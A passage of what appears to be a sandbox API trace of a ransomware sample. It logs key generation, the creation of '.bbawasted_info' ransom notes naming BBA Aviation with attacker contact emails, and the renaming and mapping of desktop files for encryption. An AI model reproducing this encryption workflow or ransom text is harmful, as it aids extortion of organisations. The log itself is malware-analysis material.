_Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ish2TjsM2YHfHUSHwbPbuD/ojSnQu3JEbRQ1b0kHsjdVKA21CB2BZPc9pgB6guSl\r\nR+EJs/4wVDjindeD4KOl6Ay2uc1q6szmoDH2fTKPASFbxqCb5ZNlpQXDWZIX0bJO\r\n6oioitu1qvth8ZEK2s+19tls7IVVg0d/2H997OIsnsSRJ3HmR8TxK3Ui1j6W1qaU\r\nQ2QlPNVoBQYOGwaCCdZi1jhW7C+5SVhGtT+u11QGzLP+XkUjyJkNldBYoQBnvqWD\r\nVpC2K/vC3hVEESCINowFsgyKxjH4YVbqup7E9m48AL/7Edhe9rxAFwOBQwamK8DF\r\nKzZZtPQktBb+8ajmSjBEzFRIYKIG2cRLccjFvT2YaLx42oKDQF6G35+raQKRQo1T\r\npn71hRfnHDiFpAq3fEJs4R3QeRrOiiLHvCS3UIjOGv0Vemr+uf86ecqJnEg9lxGr\r\nBxHVkZASrngyAz0F14h2XGZroXxgfvGBpZTEX3hhEk9gZTVA47Y/WLsGWH9Q6rEF\r\nY0/SKPl5PsiGYdRYVqvaM9uoUuVTqZR0zqApcKYvD7gueIfRxIGy7pvH6AjA1Ow9\r\nGwFtGF4MuHbgEEg9bFSD/unzFicqyUkuIBdKsQQhFJ+tRvfaX8XWEFFlIbdT/g3d\r\nwjRVulBMbIrvY2M9XZXNuar5DBAaLZdmo+a96U2zCfO=[end_key]\r\nKEEP IT\r\n") returned 984 [0208.873] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0208.873] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0208.874] SetEndOfFile (hFile=0x290) returned 1 [0208.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.876] CloseHandle (hObject=0x290) returned 1 [0209.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0209.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aff40 | out: hHeap=0x660000) returned 1 [0209.166] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6818) returned 1 [0209.168] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0209.168] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0209.168] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RbC76v5C03PlpAfXDOr.gif") returned 51 [0209.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6adb18 [0209.168] lstrcpyW (in: lpString1=0x6adb7e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0209.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.168] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6928) returned 1 [0209.169] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0209.169] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0209.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RbC76v5C03PlpAfXDOr.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\rbc76v5c03plpafxdor.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0209.170] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0209.173] SetEndOfFile (hFile=0x290) returned 1 [0209.173] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0209.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.173] lstrcpyW (in: lpString1=0x6adb7e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0209.173] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RbC76v5C03PlpAfXDOr.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\rbc76v5c03plpafxdor.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RbC76v5C03PlpAfXDOr.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\rbc76v5c03plpafxdor.gif.bbawasted")) returned 1 [0209.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RbC76v5C03PlpAfXDOr.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\rbc76v5c03plpafxdor.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0209.175] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0209.175] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xa2e3 [0209.175] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa2e3) returned 0x640000 [0209.176] CloseHandle (hObject=0x27c) returned 1 [0209.181] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0209.181] CloseHandle (hObject=0x280) returned 1 [0209.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0209.181] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a62c8) returned 1 [0209.182] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0209.182] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0209.183] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6a38) returned 1 [0209.183] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0209.183] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0209.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0209.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0209.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.197] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]l0wHxoCo4ojmEhFCqd7ZXUWoF3x3vHQQkEyy/R9xOyzoL2L141cYTzW7RJ7467Kn\r\n9oiiACuvPGGd70vq5sOfP/AfCdY/i2ni2QuB5c92JJ8pjzFPh5MbmbQzP6lZm9Gj\r\nOUXAaNZaKk8qH4GTDz3W+gFAPN/rNfYy9mZ5HtU0MQM9ynXikVD5rpBd0Hr1KenT\r\nrRB00mizL5BAgLjbV//8htIZWw23CFb1oTrH7PBuMVJOUf7oAQc7nUmpJ7CYWP9V\r\npiydi5txUO1e9mrBpLaQlxXc4cWN1WFniRjpn82oafTL1wtppp78iL/XEUhvu33t\r\n/1BP9akJ3tioMyTAFkd0+6fEJdrjmUAMihoNCDM2ggwoza/x0obPeUPqiqHgRXZI\r\nOLPnjKNZihCxsL4jNPGDBhH56XyG8PLkvPhyKq7OoOPo5xZmudH0Uvvspm9mxyDS\r\nh5cbWu+Pd+p9vsj5GMSq1egUVRX+NJXAFn036cOSamosP74JDdjICsEik3wQkbZp\r\nTISPz0HzCYrYbbC2pjcwnTaKPSLcAnxGoTjBWxjkfdNNCz0yOLNw+DII2fs9hMCz\r\nTB41Ub3xBaDXDgVwqeHbqCdLjpro6uLRQplgg4Q6SCSTOmz95gqAFuC//7rLRQc1\r\n7sgMvkgk6ONpfY37s02PV9X07OE0D1ckDu+dcyaNOw+=[end_key]\r\nKEEP IT\r\n") returned 984 [0209.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0209.197] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0209.198] SetEndOfFile (hFile=0x290) returned 1 [0209.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.201] CloseHandle (hObject=0x290) returned 1 [0209.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0209.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1870 | out: hHeap=0x660000) returned 1 [0209.420] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6b48) returned 1 [0209.421] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0209.421] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0209.421] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\skEksEAr.mp3") returned 40 [0209.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x6adb18 [0209.421] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0209.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.421] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a61b8) returned 1 [0209.422] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0209.422] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0209.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\skEksEAr.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\skeksear.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0209.422] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0209.424] SetEndOfFile (hFile=0x290) returned 1 [0209.424] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0209.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.424] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0209.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\skEksEAr.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\skeksear.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\skEksEAr.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\skeksear.mp3.bbawasted")) returned 1 [0209.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\skEksEAr.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\skeksear.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0209.425] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0209.426] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x52c2 [0209.426] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x52c2) returned 0x640000 [0209.426] CloseHandle (hObject=0x27c) returned 1 [0209.445] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0209.446] CloseHandle (hObject=0x280) returned 1 [0209.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0209.446] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f98) returned 1 [0209.446] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0209.446] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0209.446] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0209.447] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0209.447] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0209.456] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.456] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]f4dzxZP90CPtbFnGylyQa8PogPBEx5XiMI0tll88k/rDQD1pPuwuUQsjnDIZgYF3\r\nT2dn2nYg2A4zCBFdiZwFt8Y1nTGmrMQo3pyE0M752duDhpj5jgftKmYidzeI9fwy\r\nN7tEjrcPnUEe7OAkk2hAfYW/WyXBM50mMuxrxNgPxzlM7wP2t+8/2Hh+eoQ/52aB\r\nqHpAeFgMw2kCvlVuC0Qpr1Rx1VIQo503yFI79MZ9vgZDCXu3b640OAsjPV/psesJ\r\nv4irS3uXZJ6eOMMIV2yIKwCgG6X+ISBUlbR2d/sTnU9T99Eas58t7ZOxZeLf5gFO\r\nNLaJl6blLewt5TelAyQNGm9CKnQ1MIdivZZ/qgt6IvatstIaa8PSBiH3q0v7y7q1\r\nZTY9+XFbfA1gT8O9/6x3S6531G3CAu7TVdLR2F4lAOBXyNntUeCupn+fbMVBf3xE\r\n3BPLOtkRZAVNexNqkVkaULNOuQfjqbM6Y7YZ5x/gaqOGW55IfTo5P0pQ0mRq5mk6\r\nJTYcDGdoPTXiOsFZwqKBJ3v/nUqoibI5ODPtI7qzii2y5QZgc5D3FfZ6L/cV31qh\r\nlZD3GLZ+NYJIDoJhiHuJDAfDidjWZ5imng89BGzMVhbxM9C+X9K4v7eeizXJjAfO\r\nK6z0L+lv2WO4n7jMVoD13M7zWOE9fmotK9d6aPVtNvd=[end_key]\r\nKEEP IT\r\n") returned 984 [0209.456] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0209.456] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0209.456] SetEndOfFile (hFile=0x290) returned 1 [0209.459] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.459] CloseHandle (hObject=0x290) returned 1 [0209.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0209.690] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5118 | out: hHeap=0x660000) returned 1 [0209.690] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a5f10) returned 1 [0209.691] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0209.691] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0209.691] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Ti_XB2Wn6yZovs54d.docx") returned 50 [0209.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26e) returned 0x6adb18 [0209.691] lstrcpyW (in: lpString1=0x6adb7c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0209.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.692] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6bd0) returned 1 [0209.692] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0209.692] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0209.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Ti_XB2Wn6yZovs54d.docx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\ti_xb2wn6yzovs54d.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0209.693] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0209.695] SetEndOfFile (hFile=0x290) returned 1 [0209.695] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0209.695] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.695] lstrcpyW (in: lpString1=0x6adb7c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0209.695] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Ti_XB2Wn6yZovs54d.docx" (normalized: "c:\\users\\fd1hvy\\desktop\\ti_xb2wn6yzovs54d.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Ti_XB2Wn6yZovs54d.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\ti_xb2wn6yzovs54d.docx.bbawasted")) returned 1 [0209.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Ti_XB2Wn6yZovs54d.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\ti_xb2wn6yzovs54d.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0209.696] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0209.697] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x107f0 [0209.697] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x107f0) returned 0x5f0000 [0209.697] CloseHandle (hObject=0x28c) returned 1 [0209.706] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0209.707] CloseHandle (hObject=0x288) returned 1 [0209.707] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0209.707] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a65f8) returned 1 [0209.707] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0209.707] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0209.708] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6570) returned 1 [0209.708] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0209.708] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0209.721] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0209.721] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0209.721] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.721] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gVeob7+XUGha2KDBENLFwGY9VTcXpERPAzzXqzjexjTSMDtL8QSHB/7l/dYFaM3b\r\na313UXZBOtUaZC6c2nc3P1EhgyERuko0KSJh4v35cKUk3Yz3ZKGdugnXfUQ4GQ9y\r\n7c794/0VxzXs28kKSmHvr/YJvQ/GqTFsZt0FRsmfYsdAuo+s6gS9crjiTMFPQ08H\r\nIdXkWekTNkSEorOy9kmFZcr131qX/99tYwcgGzwzi0yFyhFialCxyAa85Hir8CJS\r\nrY857SEfUyX3+PVNaVGD4RtwrvsqpO9bjp99V3rRgXNFqI2rauf9xZS0lsUVyT5p\r\nyrpyg23xCrtwFJhprbAqHra2XiuDzpw1x5yagTDqHdBmxD3157zROIWcCBUiG8S6\r\n6cUrej5XIiSP8pa7UfvggWiZGoqjp7Mpeb/85WVFLUaRStAvfwSRyJLfge75AmRu\r\n0PNlaFJaLn0Sg0bfzhEnUhv39u81pxr7Q2rrO86OBTzBQaLDVBjYCyJVLN6xl5DV\r\nHPzvyza3EYtDU/BTogKtyE24Th7nEg6J28b0LP7FyGdPamPg9zfUBdkhKIA0SpVX\r\nPJ86CKmr+xwnyGaHKLdTq1J2qqP0EyJtUMiljVvaARxv6QLHNRveumav2ZJ1nUIH\r\nYksJduhRl+zT2BSUTUXFh3ojQlv8tBWOk06bIPj5Ntn=[end_key]\r\nKEEP IT\r\n") returned 984 [0209.721] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0209.721] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0209.721] SetEndOfFile (hFile=0x290) returned 1 [0209.724] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.724] CloseHandle (hObject=0x290) returned 1 [0209.918] HeapFree (in: hHeap=0x660000, 